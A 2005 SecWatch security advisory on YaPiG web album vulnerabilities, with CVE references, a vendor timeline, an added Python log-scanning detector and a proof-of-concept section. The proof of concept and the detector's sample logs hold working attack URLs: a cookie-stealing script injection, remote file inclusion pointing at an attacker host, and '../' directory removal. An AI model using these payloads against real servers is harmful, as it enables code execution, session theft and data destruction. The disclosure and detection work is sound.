======================================================================
SecWatch 04/06/2005

YaPiG Remote Arbitrary File Inclusion, Cross-Site Scripting and
Information Disclosure Vulnerabilities
======================================================================

Table of Contents

Product Introduction.................................................1
Affected.............................................................2
Severity.............................................................3
Description of Vulnerability.........................................4
Proof of Concept.....................................................5
Solution.............................................................6
Time Line............................................................7
Credits..............................................................8

======================================================================
1) Introduction

Homepage: http://yapig.sourceforge.net/
Overview: YaPiG is a simple but powerful web album.
Advisory:   http://secwatch.org/advisories/secwatch/20050530_yapig.txt
SWID:       1010769
References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1881
            http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1882
            http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1883
            http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1884
            http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1885
            http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1886
            http://www.osvdb.org/17115
            http://www.osvdb.org/17116
            http://www.osvdb.org/17117
            http://www.osvdb.org/17118
            http://www.osvdb.org/17119
            http://www.osvdb.org/17120
            http://www.osvdb.org/17121
            http://securitytracker.com/alerts/2005/Jun/1014103.html
            http://secunia.com/advisories/15600/
            http://www.securityfocus.com/bid/13874
            http://www.securityfocus.com/bid/13875
            http://www.securityfocus.com/bid/13876
            http://www.securityfocus.com/bid/13877

======================================================================
2) Affected

YaPiG version 0.92b, 0.93u and 0.94u. Prior versions may also be affected.

======================================================================
3) Severity

Rating: Less Critical
Impact: Exposure of system information
        System access
        Manipulation of data
        Cross Site Scripting
Where:  From remote
Action: Public disclosure

======================================================================
4) Description of Vulnerabilities

Multiple input validation and design vulnerabilities in YaPiG have been
reported, which can be exploited by remote users to execute arbitrary
code, conduct cross-site scripting attacks, disclose sensitive
information, create and remove arbitrary directories and potentially
gain administrative access to the web album.

The "upload.php" script fails to verify the extension of uploaded
images. A remote, authenticated user can therefore upload arbitrary
files (e.g. php files) and execute arbitrary commands on the target
system with the privileges of the web server.
Numerous scripts include other scripts insecurely. If register_globals
is enabled, a remote, unauthenticated user can include arbitrary files
from local and remote resources.

The "view.php" script fails to correctly sanitise user-supplied input
passed to the "phid" parameter, which a remote user can exploit to
execute arbitrary script code in the security context of an affected
website. As a result the code will be able to access any of the target
user's cookies, access data recently submitted by the target user via
web form to the site, or take actions on the site acting as the target
user.

The "view.php" script also fails to sanitise user-supplied input POSTed
to various parameters when adding a new comment, which can also be
exploited to conduct cross-site scripting attacks.

The "view.php" script also discloses the full installation path when a
non-integer value is passed to the "phid" parameter.

The "upload.php" script fails to validate user-supplied input passed to
the "dir" parameter before it is used in "rmdir()" and "mkdir()" calls.
A remote, authenticated user can create and remove arbitrary
directories outside of the gallery directory via the common "../"
directory traversal sequence.

If "$USE_COOKIES=true;" is set (non-default), authentication details
are stored in plain text in session cookies. A local user can read the
browser's cookies to gain administrative access to the web album.

Various other scripts/parameters are reportedly affected by similar
issues.
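The request patterns described above (script injection and non-integer
values in "phid", "../" in the "dir" parameter of "upload.php", and
include-path overrides such as "YAPIG_PATH"/"BASE_DIR") are easy to
spot in web server access logs. The following detection script is an
added example written for this advisory, not code from SecWatch or the
YaPiG project; the log lines, client addresses and hostnames in it are
constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines (not from the advisory).
# The first line is a normal request; the rest mirror the issue classes above.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Jun/2005:10:00:01 +0000] "GET /view.php?gid=1&phid=42 HTTP/1.1" 200 5120
10.0.0.9 - - [04/Jun/2005:10:00:02 +0000] "GET /view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 610
10.0.0.9 - - [04/Jun/2005:10:00:03 +0000] "GET /last_gallery.php?YAPIG_PATH=http://attacker.example/ HTTP/1.1" 200 300
10.0.0.9 - - [04/Jun/2005:10:00:04 +0000] "GET /upload.php?step=rmdir&dir=../folder HTTP/1.1" 302 0
10.0.0.9 - - [04/Jun/2005:10:00:05 +0000] "GET /view.php?gid=1&phid=alpha HTTP/1.1" 200 900
"""

# client, timestamp, method and request path of a common-log-format line
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) [^"]*"')
SCRIPT_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.I)

def classify(path: str) -> list[str]:
    """Return the issue classes a request path matches (empty list = clean)."""
    parts = urlsplit(path)
    script = parts.path.rsplit("/", 1)[-1].lower()
    # parse_qs percent-decodes values; keys are lower-cased for case-insensitive matching
    params = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    hits = []
    if script == "view.php":
        for value in params.get("phid", []):
            if SCRIPT_RE.search(value):
                hits.append("xss")
            elif not value.isdigit():
                hits.append("info-disclosure")  # non-integer phid triggers the path leak
    if script == "upload.php" and params.get("step", [""])[0] in ("mkdir", "rmdir"):
        if any(".." in v or v.startswith("/") for v in params.get("dir", [])):
            hits.append("dir-traversal")
    for key in ("yapig_path", "base_dir"):
        if key in params:  # include path supplied by the client (register_globals)
            hits.append("file-inclusion")
    return hits

def scan(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client, path, issues) for each request matching at least one rule."""
    findings = []
    for line in log_text.splitlines():
        match = REQ_RE.match(line)
        if not match:
            continue  # skip lines that are not common-log-format requests
        client, _ts, _method, path = match.groups()
        issues = classify(path)
        if issues:
            findings.append((client, path, issues))
    return findings

if __name__ == "__main__":
    for client, path, issues in scan(SAMPLE_LOG):
        print(f"{client} {','.join(issues)} {path}")
```

The same classify() rules can be fed to a URL-filtering proxy or a log
pipeline; the "info-disclosure" rule also fires on harmless typos, so it
is best used as a low-severity indicator rather than a blocking rule.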
======================================================================
5) Proof of Concept

Cross-Site Scripting:
http://[target]/view.php?gid=1&phid=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

Arbitrary File Inclusion:
Version 0.92b:
http://[target]/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/0.94u:
http://[target]/last_gallery.php?YAPIG_PATH=http://[attacker]/

Arbitrary Directory Removal:
http://[target]/upload.php?step=rmdir&dir=../folder

Arbitrary Directory Creation:
http://[target]/upload.php?step=mkdir&dir=../folder

Information Disclosure:
http://[target]/view.php?gid=1&phid=alpha

======================================================================
6) Solution

Edit the source manually to ensure user-supplied input is correctly
sanitised.
Filter malicious characters and character sequences via an HTTP proxy
or firewall with URL filtering capabilities.
Production systems should not display errors to clients.
Set 'register_globals=Off' in php.ini.
Use another product.

======================================================================
7) Time Line

29/05/2005 - Information reported to SecWatch.
30/05/2005 - Information validated by SecWatch. Vendor notified, no
             response.
02/06/2005 - Vendor notified via alternative e-mail address, no
             response.
04/06/2005 - Public disclosure.
12/06/2005 - Vendor responded, advising patched version should be
             released [no ETA given].
26/07/2005 - Vendor responded, advising new version (0.95.0) released
             to address issues.

======================================================================
8) Credits

Discovered by an anonymous person, reported via SecWatch.